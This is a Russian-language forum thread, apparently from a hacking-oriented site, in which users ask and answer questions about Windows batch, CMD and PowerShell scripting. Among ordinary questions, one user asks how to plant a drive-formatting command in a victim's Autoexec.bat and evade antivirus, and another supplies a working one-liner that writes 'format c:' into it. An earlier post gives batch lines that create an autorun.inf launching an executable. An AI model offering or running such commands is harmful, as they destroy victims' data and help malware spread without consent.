Вопросы по CMD,BAT,PowerShell

Discussion in 'Windows' started by Cthulchu, 16 Jan 2009.

  1. DooD

    DooD Moderator

    Joined:
    30 Sep 2010
    Messages:
    1,173
    Likes Received:
    437
    Reputations:
    288
    такой вопрос:надо найти на диске файл( это по идее через findstr делаем) потом по полученному пути копировать другой файл.1-е представляю как сделать,но как с путем самим быть?(зы это в бат надо)
     
    _________________________
  2. A1exx

    A1exx New Member

    Joined:
    8 Feb 2009
    Messages:
    25
    Likes Received:
    4
    Reputations:
    0
    Привет всем,очень нужна помощь,никак не могу понять как заблокировать горячие клавиши windows(а точнее,например,экранную лупу,то есть спец.возможности windows...) можно ли как-то еэо сделать в bat-файле,иль всё-таки никак?! через реестр может быть как-нибудь??
    заранее спасибо огромное
     
  3. Sind-blog

    Sind-blog Хэш-крякер

    Joined:
    4 May 2011
    Messages:
    455
    Likes Received:
    114
    Reputations:
    32
    службу отключи.
    или я не так тебя понял?
     
  4. pnp310

    pnp310 New Member

    Joined:
    13 Oct 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Есть такая проблема...надо в батнике прописать команду чтобы после запуска скачивался пакет установщика с сервера и устанавливался на компе.Как такое осуществить?
     
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Заюзай tftp для получения архива с Инэта и запусти его распаковку.
     
    _________________________
  6. pnp310

    pnp310 New Member

    Joined:
    13 Oct 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Забыл упомянуть что я совсем новичек в этом деле :) А что именно в батнике прописывать? Если можно поподробнее объяснить...плиз.
     
  7. alex202048

    alex202048 New Member

    Joined:
    6 Aug 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Нужна помощь.
    Возможно ли написать в бантике код, что бы на определенный диск (допустим С) создовался файл Autorun.inf с Определенным содержимым?

    Например:
    [autorun]
    open=AuToRuN.exe
    shellexecute=AuToRuN.exe
     
  8. masych

    masych Member

    Joined:
    28 Jun 2010
    Messages:
    28
    Likes Received:
    16
    Reputations:
    2
    echo [autorun] > C:\autorun.inf
    echo open=AuToRuN.exe >> C:\autorun.inf
    echo shellexecute=AuToRuN.exe >> C:\autorun.inf
     
  9. delt4x

    delt4x New Member

    Joined:
    9 Aug 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Уважаемые господа!
    Извините за нубский вопрос)

    Если я, например, батником на машине жертвы пропишу следующее:
    Code:
    Echo format C: /q >> c:Autoexec.bat
    Это сработает?) Антивири как нибудь на такое реагируют? И как такое будет вести себя в win7 вообще?
     
    #149 delt4x, 16 Feb 2012
    Last edited: 16 Feb 2012
  10. delt4x

    delt4x New Member

    Joined:
    9 Aug 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Блин не ужели я сложный вопрос задал? Оо
     
  11. Иван8

    Иван8 Elder - Старейшина

    Joined:
    21 Aug 2008
    Messages:
    71
    Likes Received:
    11
    Reputations:
    6
    Как можно через смд сменить имя компьютера, а так же рабочую группу или вообще домен? или хотя бы на PS это можно сделать?
     
  12. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    365
    Likes Received:
    189
    Reputations:
    92
    поднимай виртуалку и экспериментируй.
     
  13. delt4x

    delt4x New Member

    Joined:
    9 Aug 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    И антивирь туда ставить? Оо
     
  14. X-ware

    X-ware New Member

    Joined:
    28 Jun 2011
    Messages:
    5
    Likes Received:
    4
    Reputations:
    0
    Держи!!!
    вот правильный но палится будет всеми подряд:
    echo call format c: /q /u /autotest >nul >>c:autoexec.bat

    С антивирами проблему тоже можешь решить при большом желании...
     
  15. Lestat8

    Lestat8 New Member

    Joined:
    25 May 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    -1
    Подскажыте господа,можно какимто образом емулировать cmd.
     
  16. Дикс

    Дикс Elder - Старейшина

    Joined:
    16 Apr 2006
    Messages:
    1,194
    Likes Received:
    227
    Reputations:
    26
    сделал такой "скрипт" для regedit

    но на чужой винде он создал папки в реестре, а путь к питону не внес - значение осталось пустое

    можете сказать что в нем не так?
     
  17. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    544
    Likes Received:
    203
    Reputations:
    293
    А почему двойной слеш?
     
  18. Дикс

    Дикс Elder - Старейшина

    Joined:
    16 Apr 2006
    Messages:
    1,194
    Likes Received:
    227
    Reputations:
    26
    я просто экспортировал из regedit уже готовую папку со значением
    так экспортировало
     
  19. Progon4ik

    Progon4ik Banned

    Joined:
    29 Mar 2012
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Спасибо вам - с экономили мне время на ложные надежды) :D
     
  20. moaddip

    moaddip Banned

    Joined:
    23 Feb 2012
    Messages:
    276
    Likes Received:
    74
    Reputations:
    1
    Помогите настроить перезапуск процесса
    есть 1.bat

    @echo off
    echo Starting process...
    echo.
    :EnterName
    Set /p Process="Enter process name:"
    IF NOT EXIST %Process% GOTO EnterName
    :begin
    title Process %Process% control
    tasklist | findstr %Process%
    if errorlevel 1 goto NoProcess
    echo Result: Process run
    goto Done
    :NoProcess
    %Process%
    echo Result: Process %Process% stop %time%
    one
    echo.
    goto begin
    pause
    exit

    он лежит в папке с программой которую необходимо запустить , пусть будет calc .exe
    calc .exe запускаю с второго 2.bat (с необходимыми параметрами)
    периодически calc .exe вылетает , нужен его рестарт, то есть рестарт 2.bat

    программа запускается но не рестартит, помогите плиз

    забыл добавить , процесс calc.exe идёт в cmd , и получается перебивает 1ый батник
     
    #160 moaddip, 22 Aug 2012
    Last edited: 22 Aug 2012
Loading...
Similar Threads - Вопросы PowerShell
  1. byte1986
    Replies:
    13
    Views:
    3,151
  2. antis17
    Replies:
    3
    Views:
    3,268
  3. FriLL
    Replies:
    4
    Views:
    2,627
  4. Filipp
    Replies:
    4
    Views:
    3,812